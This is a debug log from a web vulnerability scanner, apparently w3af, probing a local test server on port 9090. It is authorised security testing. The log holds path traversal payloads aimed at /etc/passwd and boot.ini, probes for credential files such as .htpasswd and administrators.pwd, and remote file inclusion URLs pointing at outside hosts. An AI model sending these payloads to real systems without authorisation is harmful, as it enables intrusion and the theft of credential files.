http://localhost:9090/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24602,from_cache=0,grep=1,rtt=0.21,did=K6XyM92M) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/CSMailto.cgi returned HTTP code "404" (id=24604,from_cache=0,grep=1,rtt=0.09,did=7HPoGo95) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/servlet/SessionServlet returned HTTP code "404" (id=24605,from_cache=0,grep=1,rtt=0.17,did=arwrwh2B) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/kernel/classes/ezrole.php returned HTTP code "404" (id=24606,from_cache=0,grep=1,rtt=0.19,did=dvdhdOtv) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&=&=&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24608,from_cache=0,grep=1,rtt=0.20,did=OQ3uv9cC) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24607,from_cache=0,grep=1,rtt=0.03,did=l8UmESiU) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2436. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4518. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/.mysql_history returned HTTP code "404" (id=24609,from_cache=0,grep=1,rtt=0.48,did=GYhWmGUz) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/rubrique.asp?no=../../../../../../../../../etc/passwd\x00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24613,from_cache=0,grep=1,rtt=0.21,did=tLLoSkas) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4518. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/wbboard/reply.php returned HTTP code "404" (id=24610,from_cache=0,grep=1,rtt=0.08,did=jlm4ASyq) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum-ra.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini returned HTTP code "404" (id=24612,from_cache=0,grep=1,rtt=0.02,did=wuMPT2Ro) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini&=&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24611,from_cache=0,grep=1,rtt=0.10,did=xyk4jvGm) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd returned HTTP code "404" (id=24615,from_cache=0,grep=1,rtt=0.05,did=jUcRWOgR) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/dnewsweb returned HTTP code "404" (id=24617,from_cache=0,grep=1,rtt=0.11,did=WqUcYAts) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2437. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/htmltonuke.php?filnavn=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=24614,from_cache=0,grep=1,rtt=0.05,did=JpID1LOH) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/.htpasswd returned HTTP code "404" (id=24616,from_cache=0,grep=1,rtt=0.01,did=lbpOOuml) [Wed Feb 12 10:04:35 2020 - debug] localhost:9090 connection pool stats (free:295 / in_use:9 / max:50 / total:304) [Wed Feb 12 10:04:35 2020 - debug] Connections with more in use time: (a81c456aa06bebde, 0.25 sec) (12ae5406b13703de, 0.18 sec) (d6671b1dcad64a0d, 0.18 sec) (e3ba00a8475567dc, 0.11 sec) (81aa7998f10e510c, 0.08 sec) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4519. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgforum.cgi returned HTTP code "404" (id=24620,from_cache=0,grep=1,rtt=0.05,did=YzMdxYuE) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/zentrack/index.php returned HTTP code "404" (id=24621,from_cache=0,grep=1,rtt=0.25,did=ZTYaNfzR) [Wed Feb 12 10:04:35 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/buffer2.jsp returned HTTP code "404" (id=24618,from_cache=0,grep=1,rtt=0.15,did=3AcWKbrH) [Wed Feb 12 10:04:35 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] expect_ct.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] svn_users.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] private_ip.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] motw.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] meta_generator.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] retirejs.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:35 2020 - debug] file_upload.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:35 2020 - debug] serialized_object.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] blank_body.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] credit_cards.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/@TYPO3typo3/dev/translations.php returned HTTP code "404" (id=24623,from_cache=0,grep=1,rtt=0.11,did=vQ2lyDDx) [Wed Feb 12 10:04:35 2020 - debug] websockets_links.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] csp.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] dom_xss.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] vulners_db.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] keys.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/mantis/summary_graph_functions.php?g_jpgraph_path=http://attackershost/listings.txt? returned HTTP code "404" (id=24619,from_cache=0,grep=1,rtt=0.03,did=Fl9Js24c) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/simplestmail.cgi returned HTTP code "404" (id=24624,from_cache=0,grep=1,rtt=0.05,did=PDiWU5f2) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/infos/gen/index.asp returned HTTP code "404" (id=24625,from_cache=0,grep=1,rtt=0.20,did=cDw5E1dr) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/_private/ returned HTTP code "404" (id=24622,from_cache=0,grep=1,rtt=0.07,did=a6rZz5Kr) [Wed Feb 12 10:04:35 2020 - debug] symfony.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2438. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4520. [Wed Feb 12 10:04:35 2020 - debug] clamav.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/bb-histlog.sh returned HTTP code "404" (id=24628,from_cache=0,grep=1,rtt=0.13,did=sONOxPT0) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini returned HTTP code "404" (id=24631,from_cache=0,grep=1,rtt=0.03,did=8nqJaqH9) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2439. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=/....../boot.ini returned HTTP code "404" (id=24630,from_cache=0,grep=1,rtt=0.03,did=kXBgesGk) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/modules/WebChat/in.php returned HTTP code "404" (id=24627,from_cache=0,grep=1,rtt=0.08,did=b4hjUosq) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/bc4j.html returned HTTP code "404" (id=24626,from_cache=0,grep=1,rtt=0.20,did=3fywwcfi) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/.ssh/known_hosts returned HTTP code "404" (id=24635,from_cache=0,grep=1,rtt=0.17,did=IBB8FTvz) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/bin/contents.htm returned HTTP code "404" (id=24638,from_cache=0,grep=1,rtt=0.12,did=bEIVsDpE) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1 returned HTTP code "404" (id=24636,from_cache=0,grep=1,rtt=0.19,did=5Gmd5GGS) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/protectedpage.php?uid= returned HTTP code "404" (id=24632,from_cache=0,grep=1,rtt=0.07,did=ByGi7mM3) [Wed Feb 12 10:04:35 2020 - debug] url_session.grep(uri="http://localhost:9090/buy/") took 0.10s to run [Wed Feb 12 10:04:35 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] objects.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] error_500.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] meta_tags.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2440. [Wed Feb 12 10:04:35 2020 - debug] password_profiling.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] click_jacking.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/pageImport2.jsp returned HTTP code "404" (id=24640,from_cache=0,grep=1,rtt=0.08,did=W8zCWKIs) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/majordomo.pl returned HTTP code "404" (id=24645,from_cache=0,grep=1,rtt=0.21,did=Kbh6PZd6) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/_vti_bin/cfgwiz.exe returned HTTP code "404" (id=24646,from_cache=0,grep=1,rtt=0.26,did=5Rfzqicw) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found= returned HTTP code "404" (id=24641,from_cache=0,grep=1,rtt=0.07,did=JsXD8pta) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/scripts/tradecli.dll returned HTTP code "404" (id=24639,from_cache=0,grep=1,rtt=0.18,did=syV3z7Ds) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/postcards.cgi returned HTTP code "404" (id=24647,from_cache=0,grep=1,rtt=0.11,did=grlgepH6) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24644,from_cache=0,grep=1,rtt=0.03,did=9x7TAtFc) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/syslog.htm? = returned HTTP code "404" (id=24637,from_cache=0,grep=1,rtt=0.09,did=Dgb5Yt2h) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/shoutbox/expanded.php?conf=../../../../../../../etc/passwd returned HTTP code "404" (id=24643,from_cache=0,grep=1,rtt=0.19,did=Fqdoy5hR) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/pm/lib.inc.php returned HTTP code "404" (id=24634,from_cache=0,grep=1,rtt=0.35,did=wNKb6UXa) [Wed Feb 12 10:04:35 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini returned HTTP code "404" (id=24633,from_cache=0,grep=1,rtt=0.26,did=2kkQKgDd) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 returned HTTP code "404" (id=24629,from_cache=0,grep=1,rtt=0.15,did=b2mXl81G) [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12990, 'reject-seen-url': 5837, 'reject-out-of-scope': 216, 'accept': 4957} [Wed Feb 12 10:04:35 2020 - debug] localhost:9090 connection pool stats (free:304 / in_use:3 / max:50 / total:307) [Wed Feb 12 10:04:35 2020 - debug] Connections with more in use time: (88b6dcce1c457052, 0.18 sec) (d6671b1dcad64a0d, 0.03 sec) (0817ccfa3ccc1a32, 0.02 sec) [Wed Feb 12 10:04:35 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:35 2020 - debug] lang.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2441. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/fpsrvadm.exe returned HTTP code "404" (id=24649,from_cache=0,grep=1,rtt=0.09,did=2eAlV6Np) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24650,from_cache=0,grep=1,rtt=0.08,did=jkcbNE5I) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/CSMailto/CSMailto.cgi returned HTTP code "404" (id=24652,from_cache=0,grep=1,rtt=0.06,did=96oFKRWU) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/webcalendar/login.php returned HTTP code "404" (id=24653,from_cache=0,grep=1,rtt=0.12,did=AS1wLyD1) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/_vti_pvt/administrators.pwd returned HTTP code "404" (id=24651,from_cache=0,grep=1,rtt=0.09,did=lp4YezM0) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_professionnel.asp?n=`/etc/passwd`|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24648,from_cache=0,grep=1,rtt=0.08,did=c1PSRyJd) [Wed Feb 12 10:04:35 2020 - debug] strange_reason.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] cache_control.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_headers.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] ssn.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] oracle.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] feeds.grep(uri="http://localhost:9090/buy/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24642,from_cache=0,grep=1,rtt=0.21,did=TZOu9q48) [Wed Feb 12 10:04:35 2020 - debug] error_pages.grep(uri="http://localhost:9090/buy/") took 0.08s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/forum_professionnel.asp?n=100 returned HTTP code "404" (id=24654,from_cache=0,grep=1,rtt=0.04,did=ekXMtecd) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2442. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/members/ID.pm returned HTTP code "404" (id=24658,from_cache=0,grep=1,rtt=0.07,did=f8Uzt55R) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:35 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/buy/") took 0.07s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2443. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/donothing returned HTTP code "404" (id=24660,from_cache=0,grep=1,rtt=0.05,did=MWksvYWU) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/servlet/SimpleServlet returned HTTP code "404" (id=24663,from_cache=0,grep=1,rtt=0.15,did=cJFhgoB9) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/.htaccess returned HTTP code "404" (id=24655,from_cache=0,grep=1,rtt=0.10,did=sPBN1aaD) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/pls/simpledad/admin_/ returned HTTP code "404" (id=24659,from_cache=0,grep=1,rtt=0.20,did=E8XI7U9O) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&=&=&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24656,from_cache=0,grep=1,rtt=0.04,did=36Z9G37z) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/_head.php returned HTTP code "404" (id=24661,from_cache=0,grep=1,rtt=0.18,did=98iIbPvV) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/ldap.search.php3?ldap_serv=nonsense returned HTTP code "404" (id=24657,from_cache=0,grep=1,rtt=0.24,did=7xRgE42S) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/.passwd returned HTTP code "404" (id=24662,from_cache=0,grep=1,rtt=0.11,did=FoR6s3JC) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=/etc/passwd\x00&=&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24664,from_cache=0,grep=1,rtt=0.08,did=e3Lyeavv) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/uifc/MultFileUploadHandler.php returned HTTP code "404" (id=24669,from_cache=0,grep=1,rtt=0.25,did=uTLmtelg) [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] localhost:9090 connection pool stats (free:305 / in_use:6 / max:50 / total:311) [Wed Feb 12 10:04:35 2020 - debug] Connections with more in use time: (642057c3a3c3d9a4, 0.17 sec) (ff0d74615a61c69b, 0.17 sec) (9d9e6a05f08f298d, 0.14 sec) (9e584ec7e8ed9ea2, 0.06 sec) (d6671b1dcad64a0d, 0.06 sec) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=/etc/passwd returned HTTP code "404" (id=24666,from_cache=0,grep=1,rtt=0.02,did=zeeWrG5A) [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2444. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/change-your-password.pl returned HTTP code "404" (id=24667,from_cache=0,grep=1,rtt=0.24,did=gk13bDhO) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/infos/services/index.asp returned HTTP code "404" (id=24665,from_cache=0,grep=1,rtt=0.16,did=gCwCxbIt) [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] expect_ct.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] svn_users.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] private_ip.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] motw.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] meta_generator.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] retirejs.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] file_upload.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:35 2020 - debug] serialized_object.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] blank_body.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] credit_cards.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] websockets_links.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] csp.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] dom_xss.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] vulners_db.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] keys.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] clamav.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13013, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4958} [Wed Feb 12 10:04:35 2020 - debug] symfony.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2445. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/idealbb/error.asp?|-|0|404_Object_Not_Found= returned HTTP code "404" (id=24670,from_cache=0,grep=1,rtt=0.11,did=TFPjZxdV) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/modules/WebChat/out.php returned HTTP code "404" (id=24671,from_cache=0,grep=1,rtt=0.20,did=aZHGip3l) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/statusconfig.pl returned HTTP code "404" (id=24673,from_cache=0,grep=1,rtt=0.10,did=2Es1txl3) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/.access returned HTTP code "404" (id=24678,from_cache=0,grep=1,rtt=0.20,did=5JrL69OC) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/bb-rep.sh returned HTTP code "404" 